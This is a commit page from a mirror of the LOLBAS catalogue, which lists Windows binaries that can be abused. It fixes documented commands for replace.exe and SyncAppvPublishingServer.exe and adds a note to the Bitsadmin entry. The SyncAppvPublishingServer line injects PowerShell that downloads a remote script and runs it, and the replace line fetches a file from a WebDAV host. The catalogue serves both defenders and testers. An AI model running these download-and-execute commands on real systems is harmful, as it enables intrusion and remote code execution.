infosecn1nja
/
LOLBAS
mirror of https://github.com/infosecn1nja/LOLBAS.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #20 from jenic/master 

Some minor modifications
master
Oddvar Moe 2018-05-21 17:33:09 +02:00 committed by GitHub
parent c5aa721d7e f418a4f599
commit 1e9ae3aa9b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 5 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
OSBinaries/Bitsadmin.md
View File

@ -40,6 +40,7 @@ c:\windows\sysWOW64\bitsadmin.exe
``` ```
Notes: Notes:
* Requires active user (doesn't work from a web shell)
Detection: Detection:

2
OSBinaries/Replace.md
View File

@ -5,7 +5,7 @@
``` ```
replace c:\source\file.cab c:\destination /A replace c:\source\file.cab c:\destination /A
replace \\http://webdav.host.com \foo\bar.exe c:\outdir /A replace \\webdav.host.com\foo\bar.exe c:\outdir /A
``` ```

4
OSBinaries/Syncappvpublishingserver.md
View File

@ -3,7 +3,7 @@
* Functions: Execute * Functions: Execute
``` ```
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
``` ```
Acknowledgements: Acknowledgements:
@ -23,6 +23,6 @@ C:\Windows\System32\SyncAppvPublishingServer.exe
Notes: Notes:
Command injection into PowerShell Command injection into PowerShell
Might have been fixed in newest version of Windows 10. Might have been fixed in newest version of Windows 10.
(Works as of 10.0.16299.371)